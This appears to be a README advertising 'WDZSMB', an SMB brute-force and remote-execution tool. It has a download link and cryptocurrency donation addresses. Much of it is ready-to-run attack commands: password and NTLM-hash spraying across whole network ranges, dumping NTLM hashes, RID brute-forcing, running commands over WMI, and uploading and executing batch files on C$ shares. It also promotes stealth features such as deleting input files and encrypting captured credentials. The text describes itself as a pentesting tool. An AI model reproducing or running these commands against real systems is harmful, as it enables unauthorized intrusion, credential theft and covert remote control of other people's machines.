- WDZSMB Is A LightWeight, Memory-Efficient & Ultra Fast Performing Cli SMB (Server Message Block) Bruteforce App.
- Upload/Download File To/From Remote Server Providing Local & Remote File Paths &Or Execute Uploaded File Using '-cmd'.
- Execute Command On Remote Server Silently.
- Save Ntlm Hashes From Server Locally In 'hashes.txt' If Cred Used Have Access.
- Save Rid Brute Results From Server Locally In 'rid_info.txt' If Found.
- Scan Using Password Or Ntlm Hash (32 characters)
- Scan An Entire Network (e.g 1.1.1.0/24)
- Check If Credential(s) Are valid (e.g "server:port@domain\username;password")
- Scan Using "user;password" | "user;ntlm_hash" combo(s) (e.g "admin;admin123", "dev;ab2d4912fc7132fb7165d79cffbc5db5")
- Password Generator (e.g all perms, all upper & lower, all no repeat chars)
- Grab Network Cidr Lists For All Datacenters Or Countries(2 letter cc) (e.g all | microsoft | us)
- No Viruses, Can Be Run Using Guest Or Admin Account On Any Windows OS
- Encrypt/Decrypt Hits With A Password (Can Only Be Decrypted With This Program)
- Clean/Delete All Input Files (Total Stealth)
- Password Protected Program So Even If Found Can't Be Used Without Password
- All In 1 Lightweight Memory Efficient Application At 17.7 Mb You Can't Find That Anywhere.
- Made By A Pentester For Pentesting &Or Network Administrator Purposes
- Hit Me Up & Let Me Know, Serious Inquiries Only
- Can Be Distributed As An Executable For Windows/Linux Or As A Package To Install With Python On The System.
all
akamai
alibaba
amazon
aws_cloudfront
aws_ec2
aws_s3
bigo
bing
cloudflare
digitalocean
facebook
fastly
github
google
google_cloud
linode
microsoft
netflix
openai
oracle
telegram
twitter
zenlayer
zoom
Scan Servers In 's.txt' For Valid User 'admin' & Password 'admin@123' Using 1000 threads
smb.exe -s s.txt -u admin -p admin@123 -t 1000
Scan Servers In 's.txt' For Valid User 'admin' & NTLM_Hash '0bae622ab68138248c66d66882818dfd'
smb.exe -s s.txt -u u.txt -hs 0bae622ab68138248c66d66882818dfd
Scan Servers In 's.txt' For Valid 'User;Password' Combos In 'combo.txt' & Type Password To Encrypt Valid Creds.
smb.exe -s s.txt -up combo.txt -e
Scan Servers In Network 1.1.1.0/24 For Valid User 'user1' & Generated Password(s), Save Passwords To 'pwd.txt'
smb.exe -nw 1.1.1.0/24 -u user1 -ps user -pt nrc -pe @123 -po pwd.txt
Save All CIDR Networks For USA In us.txt
smb.exe -nc US -no us.txt
Scan Servers In 's.txt' For Users In 'u.txt' & Passwords In 'p.txt' & Stealthily Delete All 3 Input Files.
smb.exe -s s.txt -u u.txt -p p.txt -clean
Execute Command 'net user defaultaccount /active:no' On Valid Cred Servers In 'c.txt' Using 'wmi' Execution Policy.
smb.exe -c c.txt -cmd 'net user defaultaccount /active:no' -exp wmi
Upload 'cmd.bat' Local File To Valid Cred Servers C$ Share In 'c.txt' As 'Users\cmd.bat' Remote File & Execute It.
smb.exe -c c.txt -lf cmd.bat -rf Users\cmd.bat -tr -share C$ -cmd c:\Users\cmd.bat
Download 'c:\Users\a.txt' Remote File As 'b.txt' Local File From Valid Cred Servers 'C$' Share In 'c.txt'.
smb.exe -c c.txt -lf b.txt -rf Users\a.txt -dn -share C$
Save Ntlm Hashes From Valid Cred Servers In 'c.txt' In 'hashes.txt' File If Cred/User Account Used Has Access.
smb.exe -c c.txt -ntlm
Scan Network 1.1.1.0/24 Using 'admin;password' Combo & Save Found Rid Brute Results In 'rid_info.txt' & Ntlm Hashes In 'hashes.txt'.
smb.exe -nw 1.1.1.0/24 -up admin;password -rid -ntlm
https://mega.nz/file/MekGTKYQ#AZGxgi1k0A0kmp8z1MpBlm0Z-oQ2mjdUEyGH1ctg0oI
- Email: [email protected]
- Github: https://github.com/wuddz-devs
- Telegram: https://t.me/wuddz_devs
- Youtube: https://youtube.com/@wuddz-devs
- Reddit: https://reddit.com/user/wuddz-devs
- ERC20: 0xbF4d5309Bc633d95B6a8fe60E6AF490F11ed2Dd1
- BTC: bc1qa7ssx0e4l6lytqawrnceu6hf5990x4r2uwuead
- LTC: LdbcFiQVUMTfc9eJdc5Gw2nZgyo6WjKCj7
- DOGE: DFwLwtcam7n2JreSpq1r2rtkA48Vos5Hgm
- TRON: TY6e3dWGpqyn2wUgnA5q63c88PJzfDmQAD